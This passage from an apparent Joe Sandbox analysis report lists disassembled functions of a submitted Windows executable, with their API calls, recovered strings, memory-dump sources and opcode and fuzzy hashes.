                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004875BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                    • Instruction ID: 1923f87f84a105141cc97cd4dfb73f9ea5de9f9edaf5dec82e4c1ac095da0f9d
                    • Opcode Fuzzy Hash: 2462904ef93fc367447b653beb19009bbb9b8e29659318a1c617b8df96e81b81
                    • Instruction Fuzzy Hash: FA316D72104214BBDF11AF64DC08FDF3BA9FF09364F210A29FA15A61A0D739D815DBA8
                    Function 00426E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00426E3E
                      • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                    • __gmtime64_s.LIBCMT ref: 00426ED7
                    • __gmtime64_s.LIBCMT ref: 00426F0D
                    • __gmtime64_s.LIBCMT ref: 00426F2A
                    • __allrem.LIBCMT ref: 00426F80
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
                    • __allrem.LIBCMT ref: 00426FB3
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
                    • __allrem.LIBCMT ref: 00426FE8
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
                    • __invoke_watson.LIBCMT ref: 00427077
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                    • Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                    • Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
                    Function 00462527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00462542
                    • GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
                    • SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
                    • Sleep.KERNEL32(000001F4), ref: 004625EB
                    • GetMenuItemCount.USER32(?), ref: 0046262F
                    • GetMenuItemID.USER32(?,00000000), ref: 0046264B
                    • GetMenuItemID.USER32(?,-00000001), ref: 00462675
                    • GetMenuItemID.USER32(?,?), ref: 004626BA
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                    • Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
                    • Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
                    • Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
                    Function 00486F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
                    • GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
                    • _memset.LIBCMT ref: 00486FDD
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                    • Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
                    • Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
                    • Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
                    Function 00456B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
                    • SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
                    • VariantInit.OLEAUT32(?), ref: 00456C2A
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
                    • VariantCopy.OLEAUT32(?,?), ref: 00456C9D
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
                    • VariantClear.OLEAUT32(?), ref: 00456CC6
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
                    • VariantClear.OLEAUT32(?), ref: 00456CEE
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                    • Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
                    • Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
                    • Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
                    Function 004783BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                    • CoInitialize.OLE32 ref: 00478403
                    • CoUninitialize.OLE32 ref: 0047840E
                    • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
                    • IIDFromString.OLE32(?,?), ref: 004784E1
                    • VariantInit.OLEAUT32(?), ref: 0047857B
                    • VariantClear.OLEAUT32(?), ref: 004785DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 834269672-1287834457
                    • Opcode ID: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
                    • Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
                    • Opcode Fuzzy Hash: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
                    • Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
                    Function 00475732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • WSAStartup.WSOCK32(00000101,?), ref: 00475793
                    • inet_addr.WSOCK32(?,?,?), ref: 004757D8
                    • gethostbyname.WSOCK32(?), ref: 004757E4
                    • IcmpCreateFile.IPHLPAPI ref: 004757F2
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00475862
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00475878
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004758ED
                    • WSACleanup.WSOCK32 ref: 004758F3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: 88da4120b325bd232c2575f1f4021b78f4395f83c1e3df983bf90aa55158913f
                    • Instruction ID: e00705f4e0379358c1930da5d1710ca1d0dba9501fb2cabd0d468b8ffa352f64
                    • Opcode Fuzzy Hash: 88da4120b325bd232c2575f1f4021b78f4395f83c1e3df983bf90aa55158913f
                    • Instruction Fuzzy Hash: 08519F716006009FD710AF25DC45B6A77E4EF48714F05892EF95AEB3A1DB78EC14CB4A
                    Function 0046B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
                    • GetLastError.KERNEL32 ref: 0046B550
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                    • Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
                    • Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
                    • Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
                    Function 00458F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
                    • GetDlgCtrlID.USER32 ref: 0045901F
                    • GetParent.USER32 ref: 0045903B
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
                    • GetDlgCtrlID.USER32(?), ref: 00459047
                    • GetParent.USER32(?), ref: 00459063
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: e527cb334e7d7689371befb81d6d0d32f7406071002c3aa4a78959359ae4abf1
                    • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                    • Opcode Fuzzy Hash: e527cb334e7d7689371befb81d6d0d32f7406071002c3aa4a78959359ae4abf1
                    • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                    Function 0045907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                    • GetDlgCtrlID.USER32 ref: 00459108
                    • GetParent.USER32 ref: 00459124
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                    • GetDlgCtrlID.USER32(?), ref: 00459130
                    • GetParent.USER32(?), ref: 0045914C
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 1536045017-1403004172
                    • Opcode ID: 788820521d6cad1a15555ef376c01a576536d52651f0e806491d71d2e8ddf36c
                    • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                    • Opcode Fuzzy Hash: 788820521d6cad1a15555ef376c01a576536d52651f0e806491d71d2e8ddf36c
                    • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                    Function 00459163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32 ref: 0045916F
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                    • _wcscmp.LIBCMT ref: 00459196
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                    • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                    • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                    • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                    Function 004611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 004611F0
                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                    • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                    • String ID:
                    • API String ID: 2156557900-0
                    • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                    • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                    • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                    • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
                    Function 00479113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                    • API String ID: 2862541840-2080382077
                    • Opcode ID: ff95da20181f441a164f6629f45453e3d508d42e8a1a97fb14f9fa89a57037a5
                    • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                    • Opcode Fuzzy Hash: ff95da20181f441a164f6629f45453e3d508d42e8a1a97fb14f9fa89a57037a5
                    • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                    Function 0045A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                    Download Yara Rule
                    APIs
                    • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
